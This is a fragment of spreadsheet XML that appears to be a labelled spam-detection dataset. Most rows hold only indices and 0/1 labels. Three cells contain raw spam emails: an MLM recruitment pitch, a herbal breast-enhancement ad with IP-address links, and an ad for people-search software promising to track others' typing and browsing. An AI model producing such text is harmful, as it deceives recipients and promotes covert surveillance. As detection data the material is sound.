        <v>5942.0</v>
      </c>
      <c r="B5944" s="1" t="s">
        <v>6667</v>
      </c>
      <c r="C5944" s="1" t="s">
        <v>7969</v>
      </c>
      <c r="D5944" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5945">
      <c r="A5945" s="1">
        <v>5943.0</v>
      </c>
      <c r="B5945" s="1" t="s">
        <v>7970</v>
      </c>
      <c r="C5945" s="1" t="s">
        <v>7971</v>
      </c>
      <c r="D5945" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5946">
      <c r="A5946" s="1">
        <v>5944.0</v>
      </c>
      <c r="B5946" s="1" t="s">
        <v>7972</v>
      </c>
      <c r="C5946" s="1" t="s">
        <v>7973</v>
      </c>
      <c r="D5946" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5947" hidden="1">
      <c r="A5947" s="1">
        <v>5945.0</v>
      </c>
      <c r="B5947" s="1" t="s">
        <v>4292</v>
      </c>
      <c r="C5947" s="1" t="s">
        <v>4293</v>
      </c>
      <c r="D5947" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5948">
      <c r="A5948" s="1">
        <v>5946.0</v>
      </c>
      <c r="B5948" s="1" t="s">
        <v>3013</v>
      </c>
      <c r="C5948" s="3" t="str">
        <f>===============This Is Definitely the Answer We All Have Been Waiting For===============
 Every once in awhile, something comes along that you just know, from the people involved, from the features, or just from gut-feeling, that it's going to be very special, something with huge potential and hope. When you know it, it rests deep in your bones, and it's hard not to get overly excited and scream it to the world, which is why I'm writing you today. Although this program is launching with all the potential of being as big as anything on the Internet, and you will soon see it advertised and promoted everywhere you go, I would like to give you an opportunity to get in early before the masses. Traditionally, there have been a couple of flaws to any MLM (multi-level marketing for you newcomers) that have made it difficult for programs to last after the initial hoopla. Today, we have launched the solution to those problems, the newest and most innovative system ever to hit Multi-level Marketing. With a new software system and an ingenious payplan, combined with a 100% payout, everyone comes out a winner. 
 The truth is, you've got to see it to believe it, so rather than feed you a lot of hype and tell you this is the miracle you've been looking for, the magic link that will end all your problems, or a lot of other things you don't need to hear, I'm just going to make you a very simple offer. Email me with 'Send Link' in the subject line to:  itshappening@mail2world.com  and I will provide the link so you can take a test drive, absolutely risk-free. You can get a birds-eye inside look, revealing the inner-workings of this revolutionary new discovery in online income opportunities. Should you decide you like what you see, you will have the option of activating your position, but that is completely at your option. This isn't a trick, I'm just so convinced that this is such a sound program and unique but solid opportunity that I don't want you to miss out on the chance to get an early position. With an explosive launch, positions will be filling up rapidly, and you have before you a chance to explore the program before diving in head first. If you're one of those cautious people (and who isn't these days on the Internet), that likes to "look before you leap" then here is your chance. Thank you for your time, and I hope you discover why we're all smiling!!
 Please do not treat this message as spam. I am a professional and very successful networker with a data base of 100,000. I was pursueded to purchase this list containing 200,000 names of individuals, which is guaranteed to include only those people who have given their consent to receive information. I have not used this means of marketing before and frankly I am dubious about its validity. However, having spent an arm and a leg purchasing it I'm initially sending this message to just a small number of the email address's (2,000) to guage results. If you want more information I will happily supply the link without any obligation. But if its of no interest or you take exception to receiving this mail then please accept my apologies for the intrusion and delete the message immediately. As this is a one time mailing there is no need to respond with 'remove'. Thank you. 
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D5948" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5949">
      <c r="A5949" s="1">
        <v>5947.0</v>
      </c>
      <c r="B5949" s="1" t="s">
        <v>7974</v>
      </c>
      <c r="C5949" s="1" t="s">
        <v>7975</v>
      </c>
      <c r="D5949" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5950">
      <c r="A5950" s="1">
        <v>5948.0</v>
      </c>
      <c r="B5950" s="1" t="s">
        <v>7976</v>
      </c>
      <c r="C5950" s="1" t="s">
        <v>7977</v>
      </c>
      <c r="D5950" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5951">
      <c r="A5951" s="1">
        <v>5949.0</v>
      </c>
      <c r="B5951" s="1" t="s">
        <v>7978</v>
      </c>
      <c r="C5951" s="1" t="s">
        <v>7979</v>
      </c>
      <c r="D5951" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5952">
      <c r="A5952" s="1">
        <v>5950.0</v>
      </c>
      <c r="B5952" s="1" t="s">
        <v>7980</v>
      </c>
      <c r="C5952" s="1" t="s">
        <v>7981</v>
      </c>
      <c r="D5952" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5953">
      <c r="A5953" s="1">
        <v>5951.0</v>
      </c>
      <c r="B5953" s="1" t="s">
        <v>7982</v>
      </c>
      <c r="C5953" s="1" t="s">
        <v>7983</v>
      </c>
      <c r="D5953" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5954" hidden="1">
      <c r="A5954" s="1">
        <v>5952.0</v>
      </c>
      <c r="B5954" s="1" t="s">
        <v>5238</v>
      </c>
      <c r="C5954" s="1" t="s">
        <v>5239</v>
      </c>
      <c r="D5954" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5955" hidden="1">
      <c r="A5955" s="1">
        <v>5953.0</v>
      </c>
      <c r="B5955" s="1" t="s">
        <v>3137</v>
      </c>
      <c r="C5955" s="1" t="s">
        <v>3138</v>
      </c>
      <c r="D5955" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5956">
      <c r="A5956" s="1">
        <v>5954.0</v>
      </c>
      <c r="B5956" s="1" t="s">
        <v>377</v>
      </c>
      <c r="C5956" s="1" t="s">
        <v>378</v>
      </c>
      <c r="D5956" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5957" hidden="1">
      <c r="A5957" s="1">
        <v>5955.0</v>
      </c>
      <c r="B5957" s="1" t="s">
        <v>7984</v>
      </c>
      <c r="C5957" s="1" t="s">
        <v>7985</v>
      </c>
      <c r="D5957" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5958" hidden="1">
      <c r="A5958" s="1">
        <v>5956.0</v>
      </c>
      <c r="B5958" s="1" t="s">
        <v>7986</v>
      </c>
      <c r="C5958" s="1" t="s">
        <v>7987</v>
      </c>
      <c r="D5958" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5959" hidden="1">
      <c r="A5959" s="1">
        <v>5957.0</v>
      </c>
      <c r="B5959" s="1" t="s">
        <v>1655</v>
      </c>
      <c r="C5959" s="1" t="s">
        <v>1656</v>
      </c>
      <c r="D5959" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5960" hidden="1">
      <c r="A5960" s="1">
        <v>5958.0</v>
      </c>
      <c r="B5960" s="1" t="s">
        <v>763</v>
      </c>
      <c r="C5960" s="1" t="s">
        <v>764</v>
      </c>
      <c r="D5960" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5961" hidden="1">
      <c r="A5961" s="1">
        <v>5959.0</v>
      </c>
      <c r="B5961" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C5961" s="1" t="s">
        <v>5543</v>
      </c>
      <c r="D5961" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5962">
      <c r="A5962" s="1">
        <v>5960.0</v>
      </c>
      <c r="B5962" s="1" t="s">
        <v>7988</v>
      </c>
      <c r="C5962" s="1" t="s">
        <v>7989</v>
      </c>
      <c r="D5962" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5963" hidden="1">
      <c r="A5963" s="1">
        <v>5961.0</v>
      </c>
      <c r="B5963" s="1" t="s">
        <v>7990</v>
      </c>
      <c r="C5963" s="1" t="s">
        <v>7991</v>
      </c>
      <c r="D5963" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5964">
      <c r="A5964" s="1">
        <v>5962.0</v>
      </c>
      <c r="B5964" s="1" t="s">
        <v>7992</v>
      </c>
      <c r="C5964" s="1" t="s">
        <v>7993</v>
      </c>
      <c r="D5964" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5965">
      <c r="A5965" s="1">
        <v>5963.0</v>
      </c>
      <c r="B5965" s="1" t="s">
        <v>7994</v>
      </c>
      <c r="C5965" s="1" t="s">
        <v>7995</v>
      </c>
      <c r="D5965" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5966" hidden="1">
      <c r="A5966" s="1">
        <v>5964.0</v>
      </c>
      <c r="B5966" s="1" t="s">
        <v>3154</v>
      </c>
      <c r="C5966" s="1" t="s">
        <v>3155</v>
      </c>
      <c r="D5966" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5967" hidden="1">
      <c r="A5967" s="1">
        <v>5965.0</v>
      </c>
      <c r="B5967" s="1" t="s">
        <v>887</v>
      </c>
      <c r="C5967" s="1" t="s">
        <v>888</v>
      </c>
      <c r="D5967" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5968" hidden="1">
      <c r="A5968" s="1">
        <v>5966.0</v>
      </c>
      <c r="B5968" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C5968" s="1" t="s">
        <v>7996</v>
      </c>
      <c r="D5968" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5969" hidden="1">
      <c r="A5969" s="1">
        <v>5967.0</v>
      </c>
      <c r="B5969" s="1" t="s">
        <v>464</v>
      </c>
      <c r="C5969" s="1" t="s">
        <v>465</v>
      </c>
      <c r="D5969" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5970">
      <c r="A5970" s="1">
        <v>5968.0</v>
      </c>
      <c r="B5970" s="1" t="s">
        <v>7997</v>
      </c>
      <c r="C5970" s="1" t="s">
        <v>7998</v>
      </c>
      <c r="D5970" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5971" hidden="1">
      <c r="A5971" s="1">
        <v>5969.0</v>
      </c>
      <c r="B5971" s="1" t="s">
        <v>7999</v>
      </c>
      <c r="C5971" s="1" t="s">
        <v>8000</v>
      </c>
      <c r="D5971" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5972" hidden="1">
      <c r="A5972" s="1">
        <v>5970.0</v>
      </c>
      <c r="B5972" s="1" t="s">
        <v>8001</v>
      </c>
      <c r="C5972" s="1" t="s">
        <v>8002</v>
      </c>
      <c r="D5972" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5973">
      <c r="A5973" s="1">
        <v>5971.0</v>
      </c>
      <c r="B5973" s="1" t="s">
        <v>8003</v>
      </c>
      <c r="C5973" s="1" t="s">
        <v>8004</v>
      </c>
      <c r="D5973" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5974" hidden="1">
      <c r="A5974" s="1">
        <v>5972.0</v>
      </c>
      <c r="B5974" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C5974" s="1" t="s">
        <v>8005</v>
      </c>
      <c r="D5974" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5975" hidden="1">
      <c r="A5975" s="1">
        <v>5973.0</v>
      </c>
      <c r="B5975" s="1" t="s">
        <v>8006</v>
      </c>
      <c r="C5975" s="1" t="s">
        <v>8007</v>
      </c>
      <c r="D5975" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5976" hidden="1">
      <c r="A5976" s="1">
        <v>5974.0</v>
      </c>
      <c r="B5976" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C5976" s="1" t="s">
        <v>6515</v>
      </c>
      <c r="D5976" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5977">
      <c r="A5977" s="1">
        <v>5975.0</v>
      </c>
      <c r="B5977" s="1" t="s">
        <v>8008</v>
      </c>
      <c r="C5977" s="1" t="s">
        <v>8009</v>
      </c>
      <c r="D5977" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5978" hidden="1">
      <c r="A5978" s="1">
        <v>5976.0</v>
      </c>
      <c r="B5978" s="1" t="s">
        <v>8010</v>
      </c>
      <c r="C5978" s="1" t="s">
        <v>8011</v>
      </c>
      <c r="D5978" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5979">
      <c r="A5979" s="1">
        <v>5977.0</v>
      </c>
      <c r="B5979" s="1" t="s">
        <v>8012</v>
      </c>
      <c r="C5979" s="1" t="s">
        <v>8013</v>
      </c>
      <c r="D5979" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5980" hidden="1">
      <c r="A5980" s="1">
        <v>5978.0</v>
      </c>
      <c r="B5980" s="1" t="s">
        <v>4863</v>
      </c>
      <c r="C5980" s="1" t="s">
        <v>6850</v>
      </c>
      <c r="D5980" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5981" hidden="1">
      <c r="A5981" s="1">
        <v>5979.0</v>
      </c>
      <c r="B5981" s="1" t="s">
        <v>5091</v>
      </c>
      <c r="C5981" s="1" t="s">
        <v>5092</v>
      </c>
      <c r="D5981" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5982" hidden="1">
      <c r="A5982" s="1">
        <v>5980.0</v>
      </c>
      <c r="B5982" s="1" t="s">
        <v>8014</v>
      </c>
      <c r="C5982" s="1" t="s">
        <v>8015</v>
      </c>
      <c r="D5982" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5983" hidden="1">
      <c r="A5983" s="1">
        <v>5981.0</v>
      </c>
      <c r="B5983" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C5983" s="1" t="s">
        <v>7954</v>
      </c>
      <c r="D5983" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5984">
      <c r="A5984" s="1">
        <v>5982.0</v>
      </c>
      <c r="B5984" s="1" t="s">
        <v>8016</v>
      </c>
      <c r="C5984" s="1" t="s">
        <v>8017</v>
      </c>
      <c r="D5984" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5985" hidden="1">
      <c r="A5985" s="1">
        <v>5983.0</v>
      </c>
      <c r="B5985" s="1" t="s">
        <v>369</v>
      </c>
      <c r="C5985" s="1" t="s">
        <v>8018</v>
      </c>
      <c r="D5985" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5986">
      <c r="A5986" s="1">
        <v>5984.0</v>
      </c>
      <c r="B5986" s="1" t="s">
        <v>8019</v>
      </c>
      <c r="C5986" s="1" t="s">
        <v>8020</v>
      </c>
      <c r="D5986" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5987">
      <c r="A5987" s="1">
        <v>5985.0</v>
      </c>
      <c r="B5987" s="1" t="s">
        <v>8021</v>
      </c>
      <c r="C5987" s="1" t="s">
        <v>8022</v>
      </c>
      <c r="D5987" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5988" hidden="1">
      <c r="A5988" s="1">
        <v>5986.0</v>
      </c>
      <c r="B5988" s="1" t="s">
        <v>618</v>
      </c>
      <c r="C5988" s="1" t="s">
        <v>6193</v>
      </c>
      <c r="D5988" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5989" hidden="1">
      <c r="A5989" s="1">
        <v>5987.0</v>
      </c>
      <c r="B5989" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C5989" s="1" t="s">
        <v>6577</v>
      </c>
      <c r="D5989" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5990">
      <c r="A5990" s="1">
        <v>5988.0</v>
      </c>
      <c r="B5990" s="1" t="s">
        <v>6493</v>
      </c>
      <c r="C5990" s="1" t="s">
        <v>6494</v>
      </c>
      <c r="D5990" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5991" hidden="1">
      <c r="A5991" s="1">
        <v>5989.0</v>
      </c>
      <c r="B5991" s="1" t="s">
        <v>8023</v>
      </c>
      <c r="C5991" s="1" t="s">
        <v>8024</v>
      </c>
      <c r="D5991" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5992" hidden="1">
      <c r="A5992" s="1">
        <v>5990.0</v>
      </c>
      <c r="B5992" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C5992" s="1" t="s">
        <v>8025</v>
      </c>
      <c r="D5992" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5993" hidden="1">
      <c r="A5993" s="1">
        <v>5991.0</v>
      </c>
      <c r="B5993" s="1" t="s">
        <v>2548</v>
      </c>
      <c r="C5993" s="1" t="s">
        <v>7307</v>
      </c>
      <c r="D5993" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5994">
      <c r="A5994" s="1">
        <v>5992.0</v>
      </c>
      <c r="B5994" s="1" t="s">
        <v>8026</v>
      </c>
      <c r="C5994" s="1" t="s">
        <v>8027</v>
      </c>
      <c r="D5994" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5995" hidden="1">
      <c r="A5995" s="1">
        <v>5993.0</v>
      </c>
      <c r="B5995" s="1" t="s">
        <v>4643</v>
      </c>
      <c r="C5995" s="1" t="s">
        <v>4644</v>
      </c>
      <c r="D5995" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5996" hidden="1">
      <c r="A5996" s="1">
        <v>5994.0</v>
      </c>
      <c r="B5996" s="1" t="s">
        <v>8028</v>
      </c>
      <c r="C5996" s="1" t="s">
        <v>8029</v>
      </c>
      <c r="D5996" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5997">
      <c r="A5997" s="1">
        <v>5995.0</v>
      </c>
      <c r="B5997" s="1" t="s">
        <v>4454</v>
      </c>
      <c r="C5997" s="1" t="s">
        <v>4455</v>
      </c>
      <c r="D5997" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5998">
      <c r="A5998" s="1">
        <v>5996.0</v>
      </c>
      <c r="B5998" s="1" t="s">
        <v>8030</v>
      </c>
      <c r="C5998" s="1" t="s">
        <v>8031</v>
      </c>
      <c r="D5998" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5999" hidden="1">
      <c r="A5999" s="1">
        <v>5997.0</v>
      </c>
      <c r="B5999" s="1" t="s">
        <v>8032</v>
      </c>
      <c r="C5999" s="1" t="s">
        <v>8033</v>
      </c>
      <c r="D5999" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6000" hidden="1">
      <c r="A6000" s="1">
        <v>5998.0</v>
      </c>
      <c r="B6000" s="1" t="s">
        <v>8034</v>
      </c>
      <c r="C6000" s="1" t="s">
        <v>8035</v>
      </c>
      <c r="D6000" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6001" hidden="1">
      <c r="A6001" s="1">
        <v>5999.0</v>
      </c>
      <c r="B6001" s="1" t="s">
        <v>904</v>
      </c>
      <c r="C6001" s="1" t="s">
        <v>2523</v>
      </c>
      <c r="D6001" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6002">
      <c r="A6002" s="1">
        <v>6000.0</v>
      </c>
      <c r="B6002" s="1" t="s">
        <v>8036</v>
      </c>
      <c r="C6002" s="1" t="s">
        <v>8037</v>
      </c>
      <c r="D6002" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6003" hidden="1">
      <c r="A6003" s="1">
        <v>6001.0</v>
      </c>
      <c r="B6003" s="1" t="s">
        <v>259</v>
      </c>
      <c r="C6003" s="1" t="s">
        <v>8038</v>
      </c>
      <c r="D6003" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6004" hidden="1">
      <c r="A6004" s="1">
        <v>6002.0</v>
      </c>
      <c r="B6004" s="1" t="s">
        <v>8039</v>
      </c>
      <c r="C6004" s="1" t="s">
        <v>8040</v>
      </c>
      <c r="D6004" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6005" hidden="1">
      <c r="A6005" s="1">
        <v>6003.0</v>
      </c>
      <c r="B6005" s="1" t="s">
        <v>1731</v>
      </c>
      <c r="C6005" s="1" t="s">
        <v>1732</v>
      </c>
      <c r="D6005" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6006">
      <c r="A6006" s="1">
        <v>6004.0</v>
      </c>
      <c r="B6006" s="1" t="s">
        <v>8041</v>
      </c>
      <c r="C6006" s="1" t="s">
        <v>8042</v>
      </c>
      <c r="D6006" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6007" hidden="1">
      <c r="A6007" s="1">
        <v>6005.0</v>
      </c>
      <c r="B6007" s="1" t="s">
        <v>5950</v>
      </c>
      <c r="C6007" s="1" t="s">
        <v>5951</v>
      </c>
      <c r="D6007" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6008" hidden="1">
      <c r="A6008" s="1">
        <v>6006.0</v>
      </c>
      <c r="B6008" s="1" t="s">
        <v>5771</v>
      </c>
      <c r="C6008" s="1" t="s">
        <v>5772</v>
      </c>
      <c r="D6008" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6009">
      <c r="A6009" s="1">
        <v>6007.0</v>
      </c>
      <c r="B6009" s="1" t="s">
        <v>8043</v>
      </c>
      <c r="C6009" s="1" t="s">
        <v>8044</v>
      </c>
      <c r="D6009" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6010" hidden="1">
      <c r="A6010" s="1">
        <v>6008.0</v>
      </c>
      <c r="B6010" s="1" t="s">
        <v>5948</v>
      </c>
      <c r="C6010" s="1" t="s">
        <v>5949</v>
      </c>
      <c r="D6010" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6011" hidden="1">
      <c r="A6011" s="1">
        <v>6009.0</v>
      </c>
      <c r="B6011" s="1" t="s">
        <v>8045</v>
      </c>
      <c r="C6011" s="1" t="s">
        <v>8046</v>
      </c>
      <c r="D6011" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6012">
      <c r="A6012" s="1">
        <v>6010.0</v>
      </c>
      <c r="B6012" s="1" t="s">
        <v>8047</v>
      </c>
      <c r="C6012" s="1" t="s">
        <v>8048</v>
      </c>
      <c r="D6012" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6013">
      <c r="A6013" s="1">
        <v>6011.0</v>
      </c>
      <c r="B6013" s="1" t="s">
        <v>8049</v>
      </c>
      <c r="C6013" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://64.123.160.91:81/li/wangxd/
 http://202.101.163.34:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=ilug-admin@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6013" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6014" hidden="1">
      <c r="A6014" s="1">
        <v>6012.0</v>
      </c>
      <c r="B6014" s="1" t="s">
        <v>8050</v>
      </c>
      <c r="C6014" s="1" t="s">
        <v>8051</v>
      </c>
      <c r="D6014" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6015" hidden="1">
      <c r="A6015" s="1">
        <v>6013.0</v>
      </c>
      <c r="B6015" s="1" t="s">
        <v>124</v>
      </c>
      <c r="C6015" s="1" t="s">
        <v>744</v>
      </c>
      <c r="D6015" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6016" hidden="1">
      <c r="A6016" s="1">
        <v>6014.0</v>
      </c>
      <c r="B6016" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C6016" s="1" t="s">
        <v>8052</v>
      </c>
      <c r="D6016" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6017">
      <c r="A6017" s="1">
        <v>6015.0</v>
      </c>
      <c r="B6017" s="1" t="s">
        <v>8053</v>
      </c>
      <c r="C6017" s="3" t="str">
        <f>============================================
 Astounding New Software Lets You Find
 Out Almost ANYTHING about ANYONE...
 =============================================
 Download it right now (no charge card needed):
 Click here:
 &lt;a href="http://lv508p.sg.st"&gt;
 http://lv508p.sg.st &lt;/a&gt;
 Discover EVERYTHING you ever wanted to know about:
 your friends
 your family
 your enemies
 your employees
 yourself - Is Someone Using Your Identity?
 even your boss!
 DID YOU KNOW you can search for ANYONE, ANYTIME,
 ANYWHERE, right on the Internet?
 Download this software right now--click here:
 &lt;a href="http://lv508p.sg.st"&gt;
 http://lv508p.sg.st &lt;/a&gt;
 This mammoth COLLECTION of internet investigative
 tools &amp; research sites will provide you with NEARLY
 400 GIGANTIC SEARCH RESOURCES to locate information on:
 * people you trust
 * screen new tenants or roommates
 * housekeepers
 * current or past employment
 * people you work with
 * license plate number with name and address
 * unlisted phone numbers
 * long lost friends
 Locate e-mails, phone numbers, or addresses:
 o Get a Copy of Your FBI file.
 o Get a Copy of Your Military file.
 o FIND DEBTORS and locate HIDDEN ASSETS.
 o Check CRIMINAL Drug and driving RECORDS.
 o Lookup someone's EMPLOYMENT history.
 &lt;a href="http://lv508p.sg.st"&gt;
 http://lv508p.sg.st &lt;/a&gt;
 Locate old classmates, missing family
 member, or a LONG LOST LOVE:
 - Do Background Checks on EMPLOYEES before you
   hire them.
 - Investigate your family history, birth, death
   and government records!
 - Discover how UNLISTED phone numbers are located.
 - Check out your new or old LOVE INTEREST.
 - Verify your own CREDIT REPORTS so you can
   correct WRONG information.
 - Track anyone's Internet ACTIVITY; see the sites
   they visit, and what they are typing.
 - Explore SECRET WEB SITES that conventional
   search engines have never found.
 Click here:
 &lt;a href="http://lv508p.sg.st"&gt;
 http://lv508p.sg.st &lt;/a&gt;
 ==&gt; Discover little-known ways to make UNTRACEABLE
     PHONE CALLS.
 ==&gt; Check ADOPTION records; locate MISSING CHILDREN
     or relatives.
 ==&gt; Dig up information on your FRIENDS, NEIGHBORS,
     or BOSS!
 ==&gt; Discover EMPLOYMENT opportunities from AROUND
     THE WORLD!
 ==&gt; Locate transcripts and COURT ORDERS from all
     50 states.
 ==&gt; CLOAK your EMAIL so your true address can't
     be discovered.
 ==&gt; Find out how much ALIMONY your neighbor is paying.
 ==&gt; Discover how to check your phones for WIRETAPS.
 ==&gt; Or check yourself out, and you will be shocked at
     what you find!!
 These are only a few things you can do, There
 is no limit to the power of this software!!
 To download this software, and have it in less
 than 5 minutes click on the url below to visit
 our website (NEW: No charge card needed!)
 &lt;a href="http://lv508p.sg.st"&gt;
 http://lv508p.sg.st &lt;/a&gt;
 If you no longer wish to hear about future
 offers from us, send us a message with STOP
 in the subject line, by clicking here:
 &lt;a href="mailto:stop0507@excite.com?subject=STOP_LV2X0508"&gt;
 mailto:stop0507@excite.com?subject=STOP_LV2X0508 &lt;/a&gt;
 Please allow up to 72 hours to take effect.
 Please do not include any correspondence in your
 message to this automatic stop robot--it will
 not be read. All requests processed automatically.
  [:}H&amp;*TG0BK5NKIYs5]
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6017" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6018" hidden="1">
      <c r="A6018" s="1">
        <v>6016.0</v>
      </c>
      <c r="B6018" s="1" t="s">
        <v>1925</v>
      </c>
      <c r="C6018" s="1" t="s">
        <v>6923</v>
      </c>
      <c r="D6018" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6019">
      <c r="A6019" s="1">
        <v>6017.0</v>
      </c>
      <c r="B6019" s="1" t="s">
        <v>8054</v>
      </c>
      <c r="C6019" s="1" t="s">
        <v>8055</v>
      </c>
      <c r="D6019" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6020" hidden="1">
      <c r="A6020" s="1">
        <v>6018.0</v>
      </c>
      <c r="B6020" s="1" t="s">
        <v>1433</v>
      </c>
      <c r="C6020" s="1" t="s">
        <v>8056</v>
      </c>
      <c r="D6020" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6021" hidden="1">
      <c r="A6021" s="1">
        <v>6019.0</v>
      </c>
      <c r="B6021" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C6021" s="1" t="s">
        <v>8057</v>
      </c>
      <c r="D6021" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6022" hidden="1">
      <c r="A6022" s="1">
        <v>6020.0</v>
      </c>
      <c r="B6022" s="1" t="s">
        <v>14</v>
      </c>
      <c r="C6022" s="1" t="s">
        <v>15</v>
      </c>
      <c r="D6022" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6023" hidden="1">
      <c r="A6023" s="1">
        <v>6021.0</v>
      </c>
      <c r="B6023" s="1" t="s">
        <v>8058</v>
      </c>
      <c r="C6023" s="1" t="s">
        <v>8059</v>
      </c>
      <c r="D6023" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6024">
      <c r="A6024" s="1">
        <v>6022.0</v>
      </c>
      <c r="B6024" s="1" t="s">
        <v>8060</v>
      </c>
      <c r="C6024" s="1" t="s">
        <v>8061</v>
      </c>
      <c r="D6024" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6025" hidden="1">
      <c r="A6025" s="1">
        <v>6023.0</v>
      </c>
      <c r="B6025" s="1" t="s">
        <v>1345</v>
      </c>
      <c r="C6025" s="1" t="s">
        <v>1346</v>
      </c>
      <c r="D6025" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6026" hidden="1">
      <c r="A6026" s="1">
        <v>6024.0</v>
      </c>
      <c r="B6026" s="1" t="s">
        <v>8062</v>
      </c>
      <c r="C6026" s="1" t="s">
        <v>8063</v>
      </c>
      <c r="D6026" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6027" hidden="1">
      <c r="A6027" s="1">
        <v>6025.0</v>
      </c>
      <c r="B6027" s="1" t="s">
        <v>8064</v>
      </c>
      <c r="C6027" s="1" t="s">
        <v>8065</v>
      </c>
      <c r="D6027" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6028" hidden="1">
      <c r="A6028" s="1">
        <v>6026.0</v>
      </c>
      <c r="B6028" s="1" t="s">
        <v>4824</v>
      </c>
      <c r="C6028" s="1" t="s">
        <v>6080</v>
      </c>
      <c r="D6028" s="1">
